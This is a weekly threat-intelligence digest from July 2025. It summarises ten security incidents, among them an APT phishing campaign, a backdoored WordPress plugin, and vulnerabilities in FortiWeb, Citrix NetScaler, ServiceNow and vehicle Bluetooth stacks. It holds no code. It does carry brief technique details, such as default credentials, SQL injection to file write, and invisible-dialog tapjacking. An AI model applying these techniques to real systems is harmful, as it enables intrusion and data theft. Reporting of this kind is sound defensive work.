WEEKLY TOP TEN: July 14, 2025, 16:00 GMT
- DoNot APT Group Targets European Government Entities
The DoNot APT group (also known as APT-C-35, Mint Tempest, and Origami Elephant) has expanded operations to target a European foreign affairs ministry, marking a shift from their traditional focus on South Asian government entities since 2016. The attack used a spear-phishing email impersonating Italian defense officials referencing a visit to Bangladesh, delivering a password-protected RAR file through Google Drive that contained LoptikMod malware disguised as a PDF document. The malware established persistence through scheduled tasks running every 10 minutes and attempted to communicate with a command-and-control server at totalservices[.]info, though the C2 infrastructure was inactive during analysis. - McDonald’s AI Hiring System Exposed 64 Million Applicants
Security researchers Ian Carroll and Sam Curry discovered that McDonald’s McHire platform, used by 90% of franchises, was accessible using default credentials “123456:123456” for both username and password. This vulnerability, combined with an insecure direct object reference (IDOR) on an internal API, allowed access to over 64 million job applicant records, including names, email addresses, phone numbers, and authentication tokens. The researchers reported the issue, and it was fixed within hours, though the exposure created massive phishing risks. - Malicious Browser Extensions Infect 2.3 Million Users
Koi Security researchers discovered the “RedDirection” campaign involving 18 malicious extensions across Chrome and Edge that infected over 2.3 million users by masquerading as legitimate productivity tools like color pickers and video controllers. The extensions remained benign for years before introducing malicious code via silent auto-updates, exploiting trust signals like Google’s verified badges and high install counts to evade detection. The malware activates on every tab update to track browsing data and redirect users to fraudulent pages via command-and-control infrastructure, demonstrating a systemic failure in marketplace security verification processes. - Fortinet FortiWeb Pre-Auth RCE Vulnerability Disclosed
Security researchers at watchTowr disclosed CVE-2025-25257, a pre-authentication SQL injection vulnerability in Fortinet’s FortiWeb Fabric Connector that allows unauthenticated attackers to execute unauthorized SQL commands via crafted HTTP requests. The vulnerability can be exploited using MySQL’s INTO OUTFILE statement to achieve arbitrary file write as root, enabling attackers to escalate to remote code execution on affected systems. The flaw affects the function get_fabric_user_by_token, which is callable by external Fortinet products attempting to authenticate to the FortiWeb API for integration purposes. - Critical Malware Found in GravityForms Official Plugin
Patchstack received reports that GravityForms plugin version 2.9.12 downloaded from the official gravityforms.com domain contained malicious code that exfiltrated system information to the recently registered domain gravityapi.org. The malware included two backdoors: one in the update_entry_detail function that sends WordPress site data to attackers and another in the list_sections function that allows remote code execution, user account manipulation, and file operations using a hardcoded secret key. GravityForms released version 2.9.13 on July 11, 2025, to remove the backdoor, and Namecheap suspended the malicious gravityapi.org domain to prevent exploitation. - PerfektBlue Bluetooth Vulnerabilities Affect Millions of Vehicles
PCA Cyber Security researchers identified four critical vulnerabilities in OpenSynergy’s BlueSDK Bluetooth stack (CVE-2024-45431 through CVE-2024-45434) that can be chained together to achieve remote code execution on millions of vehicles from manufacturers including Mercedes-Benz, Volkswagen, and Skoda. The attack, dubbed “PerfektBlue,” requires at most one click from a user during the pairing process and can provide attackers with access to track GPS coordinates, record audio inside a car, and potentially perform lateral movement to other vehicle ECUs. OpenSynergy confirmed the vulnerabilities and provided patches to customers in September 2024, though the widespread use of BlueSDK in automotive and other industries means millions of devices remain potentially affected. - Ruckus Networks Leaves Critical Flaws Unpatched
Security researcher Noam Moshe from Claroty’s Team82 reported nine critical vulnerabilities affecting Ruckus Wireless Virtual SmartZone (vSZ) and Ruckus Network Director (RND), ranging from hardcoded SSH keys to unauthenticated remote code execution. The most severe flaw involves default public and private RSA keys that allow anyone to connect to vulnerable devices with root access, while other vulnerabilities enable authentication bypass and arbitrary file access. Despite the critical nature of these flaws affecting enterprise wireless management systems, no patches are currently available, and both Ruckus Networks and parent company CommScope have not responded to disclosure attempts. - ServiceNow Vulnerability Allows Data Extraction via Count(er) Strike
Varonis Threat Labs discovered CVE-2025-3648, dubbed “Count(er) Strike,” a high-severity vulnerability in ServiceNow’s platform that allows attackers to exploit record count UI elements to infer and extract sensitive data, including PII, credentials, and financial information. The vulnerability affects ServiceNow’s Access Control List (ACL) evaluation logic, where failed data conditions still reveal record counts that can be systematically enumerated using query operators like “STARTSWITH” or “CONTAINS.” ServiceNow issued patches in May 2025 and introduced new security mechanisms, including Query ACLs and Security Data Filters, though customers must manually review their table configurations to ensure proper protection. - TapTrap Android Attack Bypasses Permissions Using Invisible UI
Security researchers from TU Wien and the University of Bayreuth developed TapTrap, a novel tapjacking technique that exploits Android’s activity transition animations to create invisible permission dialogs that users unknowingly interact with. The attack uses custom low-opacity animations (around 0.01 alpha) to make sensitive system prompts nearly invisible while still allowing them to receive touch events, enabling attackers to gain access to camera, microphone, location, and even device administrator privileges. Analysis of 99,705 Android apps from the Play Store found that 76.3% are vulnerable to TapTrap, though no evidence of active exploitation has been found in the wild. - CitrixBleed 2 Memory Disclosure Vulnerability Discovered
WatchTowr researchers disclosed CVE-2025-5777, dubbed “CitrixBleed 2,” a critical memory disclosure vulnerability in Citrix NetScaler ADC and Gateway devices that allows unauthenticated attackers to access memory contents by sending malformed POST requests during login attempts. The vulnerability is similar to the original CitrixBleed (CVE-2023-4966) and enables attackers to steal user session tokens that can be used to hijack sessions and bypass multi-factor authentication, with each request leaking approximately 127 bytes of data. The researchers initially held back releasing technical details but eventually published their analysis due to minimal information sharing from Citrix, which puts users in a tough position when determining if they need to sound an internal alarm
Our Threat Operations and Intelligence team compiles a daily digest of the most recent online cybersecurity risks. The following top 10 stories were selected from the 40+ original ones we determined to be most significant during the course of the week, ranking by highest risk, and using multiple sources when available: